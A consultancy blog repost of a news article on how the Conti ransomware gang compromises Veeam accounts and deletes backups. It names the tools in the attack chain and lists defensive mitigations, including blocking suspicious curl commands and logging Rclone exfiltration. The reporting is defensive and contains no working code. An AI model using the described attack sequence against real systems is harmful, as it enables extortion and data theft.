The Cloud Consultancy Europe Ltd.
+44 (0) 203 637 6667 [email protected]

The Conti ransomware gang has developed novel tactics to demolish backups, especially the Veeam recovery software.

Good at identifying and obliterating backups? Speak Russian? The notorious Conti ransomware group may find you a fine hiring prospect.

That’s according to a report published on Wednesday by cyber-risk prevention firm Advanced Intelligence, which details how Conti has honed its backup destruction to a fine art. After all, backups are a major obstacle to encouraging ransomware payment.

A Conti Primer

Palo Alto Networks has described the gang as a standout, and not in a good way: “It’s one of the most ruthless of the dozens of ransomware gangs that we follow,” the firm said.

As of June, Conti had spent more than a year attacking organizations where IT outages can threaten lives: Hospitals, emergency number dispatch carriers, emergency medical services and law-enforcement agencies.

An example: In May, Ireland’s department of health services was still reeling a week after a Conti ransomware attack that wasn’t even all that successful. Officials said at the time that the attack would cost tens of millions of Euros to repair, even though the attackers didn’t even manage to encrypt systems.

Its expertise in demolishing backups has helped Conti – a top-tier Russian-speaking ransomware group that specializes in double extortion – to rain down destruction. According to AdvIntel’s Yelisey Boguslavskiy and Vitali Kremez, Conti bases its negotiation strategies on the premise that the majority of targets who pay the ransom are “motivated primarily by the need to restore their data.”

The two-slap whammy of double extortion entails both data encryption and the threat to publish that seized data. However, according to AdvIntel’s collection of Conti ransomware samples, publishing of data as only a secondary motivator for paying up – most particularly if those victims can rely on backups.

“If the victim has the ability to restore the files via backups, the chances of successful ransom payment to Conti will be minimized, even despite the fact that the risk of data-publishing persists,” the researchers wrote.

Conti’s Backup-Obliteration Methodology

AdvIntel has found that Conti builds its backup-removal expertise from the ground up, starting at the “team development level.” Namely, when the ransomware-as-a-service (RaaS) gang recruits workers to invade networks, it’s clear that penetration-tester candidates need top-notch skills at finding and obliterating backups.

“While selecting network intruders for their divisions also known as ‘teams,’ Conti is particularly clear that experience related to back-up identification, localization and deactivation is among their top priorities for a successful pen-tester,” according to AdvIntel’s analysis. “This backup focus implemented within the partnership-building process enables Conti to assemble teams, equipped with knowledge and skills aimed at backup removal.”

Veeam Vivisection

Conti has focused most particularly on developing new ways to compromise back-up software from disaster-recovery firm Veeam, researchers said.

Conti routinely initiates its attacks by installing the Cobalt Strike beacon: A legitimate, commercially available tool originally designed for network-penetration testers. It’s usage by crooks as a backdoor has gone mainstream in the world of crimeware, however.

Conti then leverages another legitimate tool: The remote-management agent Atera. Atera gives the gang persistence in an infected network.

Conti also uses Ngrok, a cross-platform application that exposes local server ports to the internet, to establish a tunnel to the local host for data exfiltration.

In many attacks seen by AdvIntel, this infection routine is followed by Conti operators finding and impersonating a privileged backup user — in order to grant themselves Veeam-backup privileges.

The attackers then typically use a weaponized Rclone – a command line program used to manage files on cloud storage – for data exfiltration of the Veeam backups. Finally, to ensure that the victim has been kneecapped and won’t be able to recover, the Conti attackers lock the victim’s system and manually remove those Veeam backups.

AdvIntel outlined the backup removal steps in the chart below:

Cobalt Strike backup removal sequence. Source: AdvIntel.

“With the Veeam account compromise, Conti has a method to deal with back-up software to ‘force’ ransom payment,” according to the firm’s writeup.

Veeam’s Response

Veeam responded to AdvIntel’s findings by saying that there’s not much the firm can do after the attackers have taken over a domain admin account. The company’s statement:

“When the attackers have access to the domain admin account there is little [Veeam] can do to protect our installation. That’s why we usually recommend using a separate domain to run backup software, this could protect [a Veeam] instance in case … the primary domain is compromised. Another approach to protect from ransomware would be to use immutable repositories, [which] can be considered safe (if configured correctly), because they allow only appending new data, not altering/purging existing backups.” —Veeam statement.

How to Stop Conti’s Backup Destruction

AdvIntel offered these mitigations and recommendations to help fend off Conti backup removal attacks:

    1. To prevent the attack initiations, employee training and email security protocols should be implemented. Conti uses very developed social-engineering techniques in order to convince the victim employees that the targeted emails are legitimate.
    2. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an alternative means for attack initiation. Tracking externally exposed endpoints is therefore critical.
    3. To prevent lateral movement, network-hierarchy protocols should be implemented with network segregation and decentralization.
    4. Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies, with the focus on any suspicious “curl” command and unauthorized “.msi” installer scripts — particularly those from C:\ProgramData and C:\Temp directory.
    5. Rclone and other data-exfiltration command-line interface activities can be captured through proper logging of process execution with command-line arguments.
    6. Special security protocols, password updates and account-security measures for Veeam should be implemented to prevent Veeam account takeover. Enabled backups tremendously decrease Conti’s ransom demands and can likely lead to data recovery with zero payments to the Conti collective.

Source: ThreatPost

Protect your environment from Ransomware attacks.

Educating yourself and your employees with Cyber Security Awareness Training is the best way to start ensuring your business is protected from cyber-attacks.

Learn more about how The Cloud Consultancy can address and manage your businesses Cyber Security headaches. We can now provision boutique, pro-active, IT support services 24/7/365